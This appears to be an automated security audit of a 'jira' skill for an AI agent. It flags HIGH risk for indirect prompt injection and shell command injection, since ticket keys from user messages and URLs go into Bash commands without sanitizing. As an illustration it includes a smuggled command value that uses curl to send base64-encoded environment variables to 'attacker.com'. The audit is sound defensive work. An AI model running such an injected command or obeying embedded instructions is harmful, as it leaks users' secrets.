jira
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [Indirect Prompt Injection] (HIGH): The skill instructs the agent to process untrusted data from user messages and URLs and use it as arguments for command-line execution.
- Ingestion points: User mentions of Jira tickets (e.g., PROJ-123) and external Jira URLs.
- Boundary markers: Absent. There are no delimiters or instructions to ignore embedded commands within the extracted data.
- Capability inventory: The skill uses the
Bashtool to executejiraCLI commands across multiple operations (view, list, create, comment). - Sanitization: Absent. The instructions suggest direct interpolation of the extracted key into the command (e.g.,
jira issue view PROJ-123). - [Command Execution] (HIGH): The skill enables the
Bashtool and provides templates for shell commands that incorporate untrusted input. An attacker could provide a malicious string (e.g.,PROJ-123; curl attacker.com/$(env | base64)) that leads to unauthorized command execution if the agent does not properly sanitize the input.
Recommendations
- AI detected serious security threats
Audit Metadata